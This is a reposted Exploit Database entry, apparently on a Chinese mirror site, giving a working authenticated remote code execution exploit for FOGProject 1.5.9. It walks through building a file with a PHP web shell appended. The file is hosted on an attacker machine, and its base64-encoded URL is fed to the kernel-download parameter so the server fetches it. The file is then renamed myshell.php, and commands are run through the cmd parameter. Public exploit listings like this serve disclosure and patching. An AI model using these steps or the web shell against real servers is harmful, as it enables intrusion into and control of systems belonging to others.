FOGProject 1.5.9 – File Upload RCE (Authenticated)

• Exploit Database
• 14 阅读

• 作者： sml
  日期： 2021-04-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49811/

• # Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated)
  # Date: 2021-04-28
  # Exploit Author: sml@lacashita.com
  # Vendor Homepage: https://fogproject.org
  # Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip
  # Tested on: Debian 10
  
  On the Attacker Machine:
  
  1) Create an empty 10Mb file.
  dd if=/dev/zero of=myshell bs=10485760 count=1
  
  2) Add your PHP code to the end of the file created in the step 1.
  echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell
  
  3) Put the file "myshell" accessible through HTTP.
  $ cp myshell /var/www/html
  
  4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).
  $ echo "http://ATTACKER_IP/myshell" | base64
  aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=
  
  5) Visit 
  http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64
  Example:
  http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64
  
  6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php 
  and click on Install.
  
  7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname